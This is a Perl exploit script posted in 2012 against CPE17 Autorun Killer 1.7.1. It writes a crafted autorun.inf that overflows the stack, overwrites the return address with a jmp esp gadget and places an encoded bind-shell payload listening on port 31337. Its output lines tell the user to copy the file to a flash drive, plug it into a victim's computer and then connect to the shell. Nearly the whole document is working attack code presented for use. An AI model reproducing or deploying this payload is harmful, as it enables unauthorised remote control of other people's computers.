Xenithz

CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit

Apr 26th, 2012
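  # CPE17 Autorun Killer <= 1.7.1 Stack Buffer Overflow exploit
  # Payload : Windows Bind TCP with port 31337
  # Exploit by : Xelenonz :D
  # Site : Xelenonz.blogspot.com
  # test with Windows XP SP 3
  # founded by : Trackerx90
  # Thanks Trackerx90 for idea
  # PoC : http://www.uppic.org/image-5B58_4F996E59.jpg

  use strict;
  use warnings;

  # This script only builds and writes one local file; the path is hard-coded.
  my $file       = "/Users/xenithz/autorun.inf";
  my $buffersize = 500;                    # bytes of filler preceding the saved return address
  my $eip        = pack('V', 0x775a676f);  # jmp esp (4-byte little-endian; presumably only valid on the test box named above)

  # Filler. The original used a literal 500 here while $buffersize went unused;
  # deriving it from the variable keeps the two from drifting apart.
  my $junk = "A" x $buffersize;

  # Bytes placed after the overwritten return address (per the header, the
  # bind-shell payload; the encoding is not documented on this page). Every byte
  # appears to be printable ASCII, so no newline translation would apply, but
  # binmode below makes the write exact regardless of platform.
  my $esp = "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
  "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" .
  "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" .
  "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x69\x78" .
  "\x6c\x49\x73\x30\x35\x50\x43\x30\x73\x50\x4f\x79\x4b\x55" .
  "\x44\x71\x38\x52\x43\x54\x4e\x6b\x33\x62\x46\x50\x4e\x6b" .
  "\x63\x62\x34\x4c\x6c\x4b\x62\x72\x66\x74\x6e\x6b\x43\x42" .
  "\x74\x68\x44\x4f\x58\x37\x43\x7a\x51\x36\x46\x51\x69\x6f" .
  "\x35\x61\x6f\x30\x6c\x6c\x47\x4c\x61\x71\x61\x6c\x75\x52" .
  "\x44\x6c\x77\x50\x4f\x31\x5a\x6f\x66\x6d\x47\x71\x39\x57" .
  "\x6d\x32\x4a\x50\x62\x72\x56\x37\x4c\x4b\x42\x72\x46\x70" .
  "\x4e\x6b\x51\x52\x47\x4c\x53\x31\x48\x50\x6c\x4b\x51\x50" .
  "\x64\x38\x4c\x45\x4f\x30\x32\x54\x43\x7a\x36\x61\x38\x50" .
  "\x36\x30\x6e\x6b\x70\x48\x77\x68\x4e\x6b\x46\x38\x35\x70" .
  "\x47\x71\x4e\x33\x4b\x53\x55\x6c\x70\x49\x6e\x6b\x56\x54" .
  "\x4c\x4b\x65\x51\x4a\x76\x75\x61\x39\x6f\x46\x51\x6f\x30" .
  "\x6c\x6c\x4a\x61\x6a\x6f\x54\x4d\x65\x51\x58\x47\x44\x78" .
  "\x4d\x30\x63\x45\x38\x74\x74\x43\x43\x4d\x38\x78\x45\x6b" .
  "\x43\x4d\x56\x44\x54\x35\x6b\x52\x56\x38\x4c\x4b\x52\x78" .
  "\x76\x44\x33\x31\x79\x43\x73\x56\x4e\x6b\x76\x6c\x42\x6b" .
  "\x6c\x4b\x42\x78\x57\x6c\x67\x71\x49\x43\x4c\x4b\x47\x74" .
  "\x6e\x6b\x76\x61\x5a\x70\x4e\x69\x30\x44\x57\x54\x71\x34" .
  "\x31\x4b\x51\x4b\x43\x51\x36\x39\x62\x7a\x66\x31\x49\x6f" .
  "\x6d\x30\x56\x38\x43\x6f\x53\x6a\x4e\x6b\x45\x42\x5a\x4b" .
  "\x6d\x56\x71\x4d\x73\x58\x66\x53\x74\x72\x73\x30\x73\x30" .
  "\x31\x78\x70\x77\x33\x43\x57\x42\x43\x6f\x76\x34\x70\x68" .
  "\x32\x6c\x50\x77\x74\x66\x54\x47\x69\x6f\x5a\x75\x58\x38" .
  "\x6e\x70\x47\x71\x67\x70\x55\x50\x55\x79\x59\x54\x31\x44" .
  "\x46\x30\x35\x38\x65\x79\x4b\x30\x52\x4b\x53\x30\x6b\x4f" .
  "\x59\x45\x72\x70\x70\x50\x70\x50\x56\x30\x71\x50\x66\x30" .
  "\x73\x70\x46\x30\x63\x58\x7a\x4a\x66\x6f\x4b\x6f\x59\x70" .
  "\x59\x6f\x5a\x75\x6f\x79\x78\x47\x30\x31\x69\x4b\x42\x73" .
  "\x73\x58\x76\x62\x33\x30\x71\x6a\x71\x79\x6d\x59\x7a\x46" .
  "\x61\x7a\x56\x70\x63\x66\x66\x37\x45\x38\x38\x42\x69\x4b" .
  "\x44\x77\x31\x77\x79\x6f\x38\x55\x72\x73\x33\x67\x72\x48" .
  "\x4c\x77\x39\x79\x36\x58\x69\x6f\x6b\x4f\x78\x55\x36\x33" .
  "\x56\x33\x32\x77\x65\x38\x74\x34\x5a\x4c\x77\x4b\x58\x61" .
  "\x69\x6f\x5a\x75\x32\x77\x4f\x79\x78\x47\x50\x68\x52\x55" .
  "\x52\x4e\x72\x6d\x63\x51\x4b\x4f\x69\x45\x52\x48\x55\x33" .
  "\x70\x6d\x55\x34\x67\x70\x4e\x69\x6b\x53\x31\x47\x51\x47" .
  "\x62\x77\x66\x51\x78\x76\x71\x7a\x52\x32\x30\x59\x52\x76" .
  "\x59\x72\x79\x6d\x51\x76\x39\x57\x70\x44\x66\x44\x35\x6c" .
  "\x57\x71\x53\x31\x6e\x6d\x77\x34\x56\x44\x34\x50\x49\x56" .
  "\x43\x30\x77\x34\x63\x64\x30\x50\x36\x36\x63\x66\x43\x66" .
  "\x61\x56\x43\x66\x70\x4e\x56\x36\x76\x36\x43\x63\x52\x76" .
  "\x33\x58\x51\x69\x4a\x6c\x35\x6f\x6c\x46\x6b\x4f\x5a\x75" .
  "\x6b\x39\x79\x70\x62\x6e\x72\x76\x63\x76\x69\x6f\x74\x70" .
  "\x51\x78\x45\x58\x6f\x77\x55\x4d\x71\x70\x79\x6f\x6b\x65" .
  "\x6d\x6b\x78\x70\x68\x35\x4e\x42\x66\x36\x32\x48\x6d\x76" .
  "\x4f\x65\x4d\x6d\x6f\x6d\x39\x6f\x48\x55\x35\x6c\x43\x36" .
  "\x43\x4c\x46\x6a\x4b\x30\x79\x6b\x79\x70\x30\x75\x36\x65" .
  "\x6f\x4b\x33\x77\x44\x53\x64\x32\x52\x4f\x63\x5a\x67\x70" .
  "\x30\x53\x69\x6f\x39\x45\x41\x41";

  # filler | return-address overwrite | bytes landing where esp points
  my $payload = $junk . $eip . $esp;

  # Three-arg open on a lexical handle, with the result checked. The original
  # two-arg form interpolated the path into the mode string and silently
  # continued on failure (an unwritable path would have printed "complete").
  open(my $fh, '>', $file) or die "open $file: $!";
  binmode $fh;                             # raw bytes, no newline translation
  print {$fh} $payload;
  close($fh) or die "close $file: $!";     # buffered write errors surface here

  print "[+] Create file complete copy\n";
  print "[+] Output file : $file\n";
  print "[+] Copy to flashdrive and plug it at victim's computer\n";
  print "[+] Connect to host with port 31337!!\n";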